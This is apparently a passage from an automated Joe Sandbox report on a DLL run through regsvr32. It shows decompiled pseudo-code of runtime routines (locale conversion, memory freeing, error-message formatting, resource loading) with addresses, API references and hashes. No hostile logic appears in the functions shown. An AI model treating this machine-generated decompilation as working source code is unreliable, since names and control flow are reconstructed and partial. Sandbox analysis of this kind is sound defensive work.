                                                                                                                                                                            								L17:
                                                                                                                                                                            								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            								__eflags = _a12 -  *_t24;
                                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t72[1];
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								L19:
                                                                                                                                                                            								__eflags = _v8;
                                                                                                                                                                            								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            								_t57 =  *_t27;
                                                                                                                                                                            								if(_v8 == 0) {
                                                                                                                                                                            									return _t57;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                            								return _t57;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _a12 - _t65;
                                                                                                                                                                            							if(_a12 < _t65) {
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _a4;
                                                                                                                                                                            							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                                            							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                            							_t56 = _v20;
                                                                                                                                                                            							if(_t58 != 0) {
                                                                                                                                                                            								goto L19;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t59 = _a4;
                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                            							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t60 = _a4;
                                                                                                                                                                            						if(_t60 != 0) {
                                                                                                                                                                            							 *_t60 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}

















                                                                                                                                                                            0x10023e8b
                                                                                                                                                                            0x10023e92
                                                                                                                                                                            0x10023ea7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023e99
                                                                                                                                                                            0x10023e9b
                                                                                                                                                                            0x10023eb3
                                                                                                                                                                            0x10023eb8
                                                                                                                                                                            0x10023ebb
                                                                                                                                                                            0x10023ebe
                                                                                                                                                                            0x10023ee7
                                                                                                                                                                            0x10023eec
                                                                                                                                                                            0x10023ef0
                                                                                                                                                                            0x10023f71
                                                                                                                                                                            0x10023f83
                                                                                                                                                                            0x10023f8c
                                                                                                                                                                            0x10023f8e
                                                                                                                                                                            0x10023ece
                                                                                                                                                                            0x10023ece
                                                                                                                                                                            0x10023ed1
                                                                                                                                                                            0x10023ed3
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023edc
                                                                                                                                                                            0x10023f50
                                                                                                                                                                            0x10023f50
                                                                                                                                                                            0x10023f55
                                                                                                                                                                            0x10023f5b
                                                                                                                                                                            0x10023f5e
                                                                                                                                                                            0x10023f60
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f67
                                                                                                                                                                            0x10023ef2
                                                                                                                                                                            0x10023ef5
                                                                                                                                                                            0x10023ef5
                                                                                                                                                                            0x10023efb
                                                                                                                                                                            0x10023efe
                                                                                                                                                                            0x10023f25
                                                                                                                                                                            0x10023f28
                                                                                                                                                                            0x10023f28
                                                                                                                                                                            0x10023f2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f30
                                                                                                                                                                            0x10023f33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f35
                                                                                                                                                                            0x10023f35
                                                                                                                                                                            0x10023f38
                                                                                                                                                                            0x10023f38
                                                                                                                                                                            0x10023f3e
                                                                                                                                                                            0x10023eac
                                                                                                                                                                            0x10023eac
                                                                                                                                                                            0x10023f47
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f47
                                                                                                                                                                            0x10023f00
                                                                                                                                                                            0x10023f03
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f07
                                                                                                                                                                            0x10023f15
                                                                                                                                                                            0x10023f18
                                                                                                                                                                            0x10023f1e
                                                                                                                                                                            0x10023f20
                                                                                                                                                                            0x10023f23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f23
                                                                                                                                                                            0x10023ec0
                                                                                                                                                                            0x10023ec3
                                                                                                                                                                            0x10023ec5
                                                                                                                                                                            0x10023ecb
                                                                                                                                                                            0x10023ecb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023e9d
                                                                                                                                                                            0x10023e9d
                                                                                                                                                                            0x10023ea2
                                                                                                                                                                            0x10023ea4
                                                                                                                                                                            0x10023ea4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023ea2
                                                                                                                                                                            0x10023e9b

                                                                                                                                                                            APIs
                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 10023EE7
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                            • Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                                                                                            • Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                                                                                            • Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				void* _t51;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            
                                                                                                                                                                            				_t65 = __edi;
                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                            				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                                                                                            				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                            					L19:
                                                                                                                                                                            					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t32 = _t29 - 1;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                                                                                            				if(_t32 != 0) {
                                                                                                                                                                            					goto L19;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					L8:
                                                                                                                                                                            					_push(_t65);
                                                                                                                                                                            					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
                                                                                                                                                                            					_t70 = E100139DB(0x10058f44);
                                                                                                                                                                            					if(_t70 == 0 || _t66 == 0) {
                                                                                                                                                                            						L18:
                                                                                                                                                                            						goto L19;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                                                                            						_t80 = _t35;
                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                                                                                            								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                                                                            								_a4 = _a4 & 0x00000000;
                                                                                                                                                                            								_t83 = _t36;
                                                                                                                                                                            								if(_t36 != 0) {
                                                                                                                                                                            									_push(_t36);
                                                                                                                                                                            									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
                                                                                                                                                                            									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                                                                                            									_a4 = _t39;
                                                                                                                                                                            									E10016380(_t51, _t66, _t70, _t83);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                                                                                            								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                                                                                            								if(_t37 == 0 && _a4 != _t37) {
                                                                                                                                                                            									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                            						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a4 != 0xffffffff) {
                                                                                                                                                                            					_t47 = E1000B510();
                                                                                                                                                                            					if(_t47 != 0) {
                                                                                                                                                                            						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                                                                                            						_t77 = _t48;
                                                                                                                                                                            						if(_t48 != 0) {
                                                                                                                                                                            							 *_t48(0, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                                                                                            				goto L8;
                                                                                                                                                                            			}





















                                                                                                                                                                            0x100145b9
                                                                                                                                                                            0x100145b9
                                                                                                                                                                            0x100145c3
                                                                                                                                                                            0x100145c5
                                                                                                                                                                            0x100145cc
                                                                                                                                                                            0x100146a4
                                                                                                                                                                            0x100146af
                                                                                                                                                                            0x100146af
                                                                                                                                                                            0x100145d2
                                                                                                                                                                            0x100145d5
                                                                                                                                                                            0x100145d8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100145e1
                                                                                                                                                                            0x10014625
                                                                                                                                                                            0x10014625
                                                                                                                                                                            0x1001462b
                                                                                                                                                                            0x10014638
                                                                                                                                                                            0x1001463c
                                                                                                                                                                            0x100146a3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014642
                                                                                                                                                                            0x10014642
                                                                                                                                                                            0x10014645
                                                                                                                                                                            0x10014647
                                                                                                                                                                            0x10014658
                                                                                                                                                                            0x1001465f
                                                                                                                                                                            0x10014661
                                                                                                                                                                            0x10014664
                                                                                                                                                                            0x10014668
                                                                                                                                                                            0x1001466a
                                                                                                                                                                            0x1001466c
                                                                                                                                                                            0x1001466d
                                                                                                                                                                            0x10014672
                                                                                                                                                                            0x10014675
                                                                                                                                                                            0x10014678
                                                                                                                                                                            0x1001467e
                                                                                                                                                                            0x10014685
                                                                                                                                                                            0x1001468d
                                                                                                                                                                            0x10014690
                                                                                                                                                                            0x100146a0
                                                                                                                                                                            0x100146a0
                                                                                                                                                                            0x10014690
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001465f
                                                                                                                                                                            0x10014649
                                                                                                                                                                            0x10014656
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014656
                                                                                                                                                                            0x1001463c
                                                                                                                                                                            0x100145e7
                                                                                                                                                                            0x100145e9
                                                                                                                                                                            0x100145f0
                                                                                                                                                                            0x100145f2
                                                                                                                                                                            0x100145f5
                                                                                                                                                                            0x100145f7
                                                                                                                                                                            0x100145fb
                                                                                                                                                                            0x100145fb
                                                                                                                                                                            0x100145f7
                                                                                                                                                                            0x100145f0
                                                                                                                                                                            0x10014600
                                                                                                                                                                            0x10014608
                                                                                                                                                                            0x10014610
                                                                                                                                                                            0x10014618
                                                                                                                                                                            0x10014620
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __msize_malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1288803200-0
                                                                                                                                                                            • Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                                                                                            • Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
                                                                                                                                                                            • Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                            				intOrPtr* _v0;
                                                                                                                                                                            				void* _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				char _t36;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            
                                                                                                                                                                            				_t44 = __eflags;
                                                                                                                                                                            				_t38 = __esi;
                                                                                                                                                                            				_t37 = __edi;
                                                                                                                                                                            				_t31 = __ebx;
                                                                                                                                                                            				_push(4);
                                                                                                                                                                            				E10017BC1(E10027DA5, __ebx, __edi, __esi);
                                                                                                                                                                            				_t35 = E10009B91(_t44, 0xc);
                                                                                                                                                                            				_v16 = _t35;
                                                                                                                                                                            				_t20 = 0;
                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                            				if(_t35 != 0) {
                                                                                                                                                                            					_t20 = E10009CDE(_t35);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t36 = _a4;
                                                                                                                                                                            				_v8 = _v8 | 0xffffffff;
                                                                                                                                                                            				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                                                                                            				_a4 = _t20;
                                                                                                                                                                            				E10017C83( &_a4, 0x1002e16c);
                                                                                                                                                                            				asm("int3");
                                                                                                                                                                            				_t40 = _t42;
                                                                                                                                                                            				_t23 = _v0;
                                                                                                                                                                            				_push(_t31);
                                                                                                                                                                            				if(_t23 != 0) {
                                                                                                                                                                            					 *_t23 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                                                                                            					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                                                                                            					LocalFree(_a12);
                                                                                                                                                                            					_t29 = 1;
                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *_a4 = 0;
                                                                                                                                                                            					_t29 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t29;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d3b
                                                                                                                                                                            0x10009d48
                                                                                                                                                                            0x10009d4a
                                                                                                                                                                            0x10009d4d
                                                                                                                                                                            0x10009d51
                                                                                                                                                                            0x10009d54
                                                                                                                                                                            0x10009d56
                                                                                                                                                                            0x10009d56
                                                                                                                                                                            0x10009d5b
                                                                                                                                                                            0x10009d5e
                                                                                                                                                                            0x10009d62
                                                                                                                                                                            0x10009d65
                                                                                                                                                                            0x10009d71
                                                                                                                                                                            0x10009d76
                                                                                                                                                                            0x10009d78
                                                                                                                                                                            0x10009d7a
                                                                                                                                                                            0x10009d7d
                                                                                                                                                                            0x10009d82
                                                                                                                                                                            0x10009d84
                                                                                                                                                                            0x10009d84
                                                                                                                                                                            0x10009da2
                                                                                                                                                                            0x10009db8
                                                                                                                                                                            0x10009dc3
                                                                                                                                                                            0x10009dcb
                                                                                                                                                                            0x10009dcb
                                                                                                                                                                            0x10009da4
                                                                                                                                                                            0x10009da7
                                                                                                                                                                            0x10009da9
                                                                                                                                                                            0x10009da9
                                                                                                                                                                            0x10009dce

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10009D3B
                                                                                                                                                                              • Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10009D71
                                                                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A
                                                                                                                                                                              • Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D
                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 10009DC3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1615547351-0
                                                                                                                                                                            • Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                                                                                            • Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
                                                                                                                                                                            • Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E1000C887(void* __ecx) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				signed short _t35;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				signed short* _t40;
                                                                                                                                                                            
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                            				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                                                                                            				_t40 =  *(__ecx + 0x60);
                                                                                                                                                                            				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                                                                                            					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                                                                                            					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					_t40 = LockResource(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                            				if(_t40 != 0) {
                                                                                                                                                                            					_t35 =  *_t40;
                                                                                                                                                                            					if(_t40[1] != 0xffff) {
                                                                                                                                                                            						_t23 = _t40[5] & 0x0000ffff;
                                                                                                                                                                            						_t34 = _t40[6] & 0x0000ffff;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t35 = _t40[6];
                                                                                                                                                                            						_t23 = _t40[9] & 0x0000ffff;
                                                                                                                                                                            						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                                                                                            						_t30 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t37 + 0x58) != 0) {
                                                                                                                                                                            					FreeResource(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t30;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000c88a
                                                                                                                                                                            0x1000c88b
                                                                                                                                                                            0x1000c88e
                                                                                                                                                                            0x1000c890
                                                                                                                                                                            0x1000c897
                                                                                                                                                                            0x1000c89a
                                                                                                                                                                            0x1000c89d
                                                                                                                                                                            0x1000c8a4
                                                                                                                                                                            0x1000c8bb
                                                                                                                                                                            0x1000c8bb
                                                                                                                                                                            0x1000c8c2
                                                                                                                                                                            0x1000c8cd
                                                                                                                                                                            0x1000c8cd
                                                                                                                                                                            0x1000c8d1
                                                                                                                                                                            0x1000c8d4
                                                                                                                                                                            0x1000c8dc
                                                                                                                                                                            0x1000c8de
                                                                                                                                                                            0x1000c8ed
                                                                                                                                                                            0x1000c8f1
                                                                                                                                                                            0x1000c8e0
                                                                                                                                                                            0x1000c8e0
                                                                                                                                                                            0x1000c8e3
                                                                                                                                                                            0x1000c8e7
                                                                                                                                                                            0x1000c8e7
                                                                                                                                                                            0x1000c8fa
                                                                                                                                                                            0x1000c906
                                                                                                                                                                            0x1000c906
                                                                                                                                                                            0x1000c8fa
                                                                                                                                                                            0x1000c90c
                                                                                                                                                                            0x1000c911
                                                                                                                                                                            0x1000c911
                                                                                                                                                                            0x1000c91d

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 1000C8C7
                                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000C911
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                                            • Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                                                                                            • Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
                                                                                                                                                                            • Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                                                                                            • Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				intOrPtr* _t51;
                                                                                                                                                                            				void* _t52;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            
                                                                                                                                                                            				_t53 = __eflags;
                                                                                                                                                                            				_t46 = __ecx;
                                                                                                                                                                            				_t44 = __ebx;
                                                                                                                                                                            				_push(4);
                                                                                                                                                                            				E10017BC1(E10027E86, __ebx, __edi, __esi);
                                                                                                                                                                            				_t51 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                                                                                            				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                                                                                            				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                                                                                            				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                                            				 *_t51 = 0x10029f54;
